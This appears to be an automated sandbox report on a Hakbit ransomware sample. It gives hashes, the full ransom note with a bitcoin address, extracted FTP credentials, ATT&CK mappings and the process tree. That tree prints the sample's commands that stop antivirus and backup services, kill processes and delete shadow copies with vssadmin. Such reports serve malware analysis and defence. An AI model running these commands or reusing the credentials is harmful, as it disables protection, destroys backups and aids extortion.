hakbit | 34b93f1989b272866f023c34a2243978565fcfd23869cacc58ce592c1c545d8e

Analysis

max time kernel
211s
max time network
174s
platform
windows7_x64
resource
win7v200430
submitted
10-05-2020 00:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client-17.exe
Size

60KB
MD5

0f27d1180d28e1bcaf4d66f6b51c087c
SHA1

15a00d3aba362aade900374b6d159de98e8eac62
SHA256

34b93f1989b272866f023c34a2243978565fcfd23869cacc58ce592c1c545d8e
SHA512

7a6f8f1f55fbd37124fdf24ce057f8cb2231ecc2fc4cf9d9028ab83436e64ae59af97a5e4ec1e6587ebcdfe6487f6794450ba961429afba0b24bd6fb48237ea8

Score

10^/10

hakbit ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HELP_ME_MY_FILES_NOT_MAKE_PUBLIC.txt

Family

hakbit

Ransom Note

Atention! all your important files were encrypted! to get your files back send 250 Euro in Bitcoins and contact us on E-Mail with proof of payment and your Key Identifier, you can find this here. We will send you a decryption tool with your personal decryption password. When you not Contact us and Pay, we do make your Data Public on a Websites, where everyone sees their entire computer content from you. -------------------------------------------------------------------------------------------------------------- Where can you buy Bitcoins: https://www.coinbase.com https://localbitcoins.com https://anycoin.eu https://bitpanda.com https://binance.com https://bitcoinbon.at For Switzerland and Austria Bitcoin Automat Värdex - Swiss Clients All SBB Automat - Swiss Clients Bitcoin Bon - Austria Clients You can calculate the Bitcoin rate here: https://preev.com -------------------------------------------------------------------------------------------------------------- Contact: [email protected] Please send us the key identification code via email, which you can see at the bottom of this text as soon as the payment has been made by you. Please send the Bitcoin on this Adress for the Payment: bc1q5dn3tc67wh90mrq65xm8a2z9lr9t0tc2lctwv3 -------------------------------------------------------------------------------------------------------------- GERMAN SPEAK CLIENTS -------------------------------------------------------------------------------------------------------------- Achtung! Alle Ihre Daten wurden verschlüsselt, wenn Sie alle ihre Daten auf Ihrem Rechner wieder wollen, dann Bezahlen Sie 250 Euro in Bitcoins und Kontaktieren Sie uns via E-Mail mit einer Bestätigung der Zahlung an unsere Bitcoin Adresse. Wir senden Ihnen dann ein Entschlüsselungs Programm damit Sie alles wieder Entschlüsseln können. Falls Sie nicht innerhalb ein paar Tagen Bezahlen,werden wir Ihre Date auf einer Webseite veröffentlichen die für jeden Zugänglich ist. Oberhalb des Textes sehen Sie wo Sie die Bitcoins erwerben können um diese an uns zu senden. Bitte senden Sie uns via E-Mail den Key Identifikationscode, diesen sehen Sie ganz unten in diesem Text aufgeführt, sobald die Zahlung getätigt wurde von Ihnen. Unsere Kontakt E-Mail : [email protected] -------------------------------------------------------------------------------------------------------------- Bitte senden sie hierhin die Bitcoins für die Zahlung bc1q5dn3tc67wh90mrq65xm8a2z9lr9t0tc2lctwv3 -------------------------------------------------------------------------------------------------------------- IDENTIFICATIONSKEY - IDENTIFKATIONSCODE / SEND THIS CODE VIA E-MAIL L1kIUMVBjbEiR17vks+oODArJwFMRXrDekxJXoYOKBtWCzPmmQewVxW1TPgC+pNBa7FO+M1OyjUVU8MFCuUSqkhdFUx70YNpMU1VtOTrxtVBMViYzdxD5JL6RSBGnCbW9m7tuB5Ks21ayk/olr1XzV1pfSuz6tN6EYQOgnM0f85CwPIMWEPZ+uV/tj1x+A4b7+6WfwODAfTafgqgz5e2og31DxmLDdu8++OUvE3ew7SkxI72eCkQ0tYJrliQw8zZ4eYZTWt/WIbAQIgr0jdYN5wqVRwH9BBXbcUZOQCphi/o5Va5eDVs8oeqpqu7h6/mGeEfHKNmvep5Q82KsgtpjQ==

Emails

[email protected]

Wallets

bc1q5dn3tc67wh90mrq65xm8a2z9lr9t0tc2lctwv3

Extracted

Credentials

Protocol: ftp
Host:
199.188.200.253
Port:
21
Username:
[email protected]
Password:
13MelisaLening37

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\SwitchPing.png.crypted	Client-17.exe
File created	C:\Users\Admin\Pictures\LimitRepair.raw.crypted	Client-17.exe
File created	C:\Users\Admin\Pictures\UnlockInstall.tiff.crypted	Client-17.exe
File opened for modification	C:\Users\Admin\Pictures\UnlockInstall.tiff	Client-17.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp"	Client-17.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
968	1008	WerFault.exe	23

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1540	vssadmin.exe
1800	vssadmin.exe
1508	vssadmin.exe
1248	vssadmin.exe
1152	vssadmin.exe
792	vssadmin.exe
1240	vssadmin.exe
1580	vssadmin.exe
908	vssadmin.exe
1512	vssadmin.exe
740	vssadmin.exe
1704	vssadmin.exe
1780	vssadmin.exe
1860	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1432	taskkill.exe
1936	taskkill.exe
2008	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2012	notepad.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1008	Client-17.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeBackupPrivilege	384	vssvc.exe
Token: SeRestorePrivilege	384	vssvc.exe
Token: SeAuditPrivilege	384	vssvc.exe
Token: SeDebugPrivilege	968	WerFault.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1008	Client-17.exe
2012	notepad.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1008	Client-17.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1008 wrote to memory of 1412	1008	Client-17.exe	24
PID 1008 wrote to memory of 1412	1008	Client-17.exe	24
PID 1008 wrote to memory of 1412	1008	Client-17.exe	24
PID 1008 wrote to memory of 1412	1008	Client-17.exe	24
PID 1412 wrote to memory of 384	1412	net.exe	26
PID 1412 wrote to memory of 384	1412	net.exe	26
PID 1412 wrote to memory of 384	1412	net.exe	26
PID 1412 wrote to memory of 384	1412	net.exe	26
PID 1008 wrote to memory of 1460	1008	Client-17.exe	27
PID 1008 wrote to memory of 1460	1008	Client-17.exe	27
PID 1008 wrote to memory of 1460	1008	Client-17.exe	27
PID 1008 wrote to memory of 1460	1008	Client-17.exe	27
PID 1460 wrote to memory of 1572	1460	net.exe	29
PID 1460 wrote to memory of 1572	1460	net.exe	29
PID 1460 wrote to memory of 1572	1460	net.exe	29
PID 1460 wrote to memory of 1572	1460	net.exe	29
PID 1008 wrote to memory of 276	1008	Client-17.exe	30
PID 1008 wrote to memory of 276	1008	Client-17.exe	30
PID 1008 wrote to memory of 276	1008	Client-17.exe	30
PID 1008 wrote to memory of 276	1008	Client-17.exe	30
PID 276 wrote to memory of 544	276	net.exe	32
PID 276 wrote to memory of 544	276	net.exe	32
PID 276 wrote to memory of 544	276	net.exe	32
PID 276 wrote to memory of 544	276	net.exe	32
PID 1008 wrote to memory of 780	1008	Client-17.exe	33
PID 1008 wrote to memory of 780	1008	Client-17.exe	33
PID 1008 wrote to memory of 780	1008	Client-17.exe	33
PID 1008 wrote to memory of 780	1008	Client-17.exe	33
PID 780 wrote to memory of 740	780	net.exe	35
PID 780 wrote to memory of 740	780	net.exe	35
PID 780 wrote to memory of 740	780	net.exe	35
PID 780 wrote to memory of 740	780	net.exe	35
PID 1008 wrote to memory of 1132	1008	Client-17.exe	36
PID 1008 wrote to memory of 1132	1008	Client-17.exe	36
PID 1008 wrote to memory of 1132	1008	Client-17.exe	36
PID 1008 wrote to memory of 1132	1008	Client-17.exe	36
PID 1132 wrote to memory of 1112	1132	net.exe	38
PID 1132 wrote to memory of 1112	1132	net.exe	38
PID 1132 wrote to memory of 1112	1132	net.exe	38
PID 1132 wrote to memory of 1112	1132	net.exe	38
PID 1008 wrote to memory of 1544	1008	Client-17.exe	39
PID 1008 wrote to memory of 1544	1008	Client-17.exe	39
PID 1008 wrote to memory of 1544	1008	Client-17.exe	39
PID 1008 wrote to memory of 1544	1008	Client-17.exe	39
PID 1544 wrote to memory of 1512	1544	net.exe	41
PID 1544 wrote to memory of 1512	1544	net.exe	41
PID 1544 wrote to memory of 1512	1544	net.exe	41
PID 1544 wrote to memory of 1512	1544	net.exe	41
PID 1008 wrote to memory of 1696	1008	Client-17.exe	42
PID 1008 wrote to memory of 1696	1008	Client-17.exe	42
PID 1008 wrote to memory of 1696	1008	Client-17.exe	42
PID 1008 wrote to memory of 1696	1008	Client-17.exe	42
PID 1696 wrote to memory of 1384	1696	net.exe	44
PID 1696 wrote to memory of 1384	1696	net.exe	44
PID 1696 wrote to memory of 1384	1696	net.exe	44
PID 1696 wrote to memory of 1384	1696	net.exe	44
PID 1008 wrote to memory of 1292	1008	Client-17.exe	45
PID 1008 wrote to memory of 1292	1008	Client-17.exe	45
PID 1008 wrote to memory of 1292	1008	Client-17.exe	45
PID 1008 wrote to memory of 1292	1008	Client-17.exe	45
PID 1292 wrote to memory of 1824	1292	net.exe	47
PID 1292 wrote to memory of 1824	1292	net.exe	47
PID 1292 wrote to memory of 1824	1292	net.exe	47
PID 1292 wrote to memory of 1824	1292	net.exe	47

C:\Users\Admin\AppData\Local\Temp\Client-17.exe
"C:\Users\Admin\AppData\Local\Temp\Client-17.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1008
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:384
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:1572
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:276
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:544
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:740
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1132
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:1112
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:1512
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:1384
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1292
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:1824
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:1776
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:524
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:320
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:800
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:672
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:844
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:1272
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:568
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:1236
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:1116
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:840
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:1860
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:1600
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:1580
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:1928
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:1884
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:1984
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:1948
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:1148
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:2008
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:636
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:2040
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:1500
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:1576
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:1524
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:1620
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:824
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:740
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:744
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:1648
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:1532
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:1376
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:1840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:656
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:368
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:800
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:796
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:1252
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1260
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:620
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1692
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1656
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1608
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1740
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1936
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2008
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1508
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:740
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1540
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1704
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1780
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1240
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1248
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1860
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1580
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1152
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:908
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:792
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1512
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1800
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_MY_FILES_NOT_MAKE_PUBLIC.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  - Suspicious use of FindShellTrayWindow
  PID:2012
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 1476
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:968

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:384

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/968-3-0x00000000021D0000-0x00000000021E1000-memory.dmp

Filesize
68KB

Download
memory/968-4-0x00000000027A0000-0x00000000027B1000-memory.dmp

Filesize
68KB

Download